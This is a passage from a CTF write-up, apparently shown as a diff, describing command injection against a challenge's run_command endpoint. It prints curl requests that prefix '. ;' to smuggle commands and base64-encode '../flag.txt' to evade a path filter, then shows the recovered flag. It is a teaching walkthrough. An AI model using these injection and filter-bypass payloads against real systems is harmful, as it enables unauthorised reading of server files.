SENSEIXENUS2/SENSEIXENUS2.github.io/posts/ctf/Braekerctf/Braekerctf.md

       $ curl -X POST https://braekerctf-empty-execution.chals.io/run_command -d '{"command": ". ;which base64;which echo"}' -H 'Content-Type: application/json'
       {"message":"Command output: /bin/base64\n/bin/echo\n"}

-- Now we can craft a payload with base64 and echo,I was able to craft this payload `base64 $(echo 'Li4vZmxhZy50eHQK' | base64 -d)`.I encoded '../flag.txt' with base64 since flag.txt is not present in the current directory, we will need to move up one directory and .. and / are both filtered by the code.Echo pipes it to base64 which decodes it and the process is executed with $().Base64 can read files passed to it and return it in base64 encoded text.After that, the result of that will be transferred to `base64 -d` via a pipe to decode the base64 encoded flag.
+- Now we can craft a payload with base64 and echo,I was able to craft this payload `base64 $(echo 'Li4vZmxhZy50eHQK' | base64 -d)`.I encoded '../flag.txt' with base64 since flag.txt is not present in the current directory, we will need to move up one directory and .. and / are both filtered by the code.Echo pipes it to base64 which decodes it and the process is executed with $().Base64 can read files passed to it and return it in base64 encoded text.After that, the result will be transferred to `base64 -d` via a pipe to decode the base64 encoded flag.

        curl -X POST https://braekerctf-empty-execution.chals.io/run_command -d '{"command": ". ;echo $(base64 $(echo 'Li4vZmxhZy50eHQK' | base64 -d)) | base64 -d"}' -H 'Content-Type: application/json'
        {"message":"Command output: brck{Ch33r_Up_BuddY_JU5t_3x3Cut3_4_D1reCT0ry}"}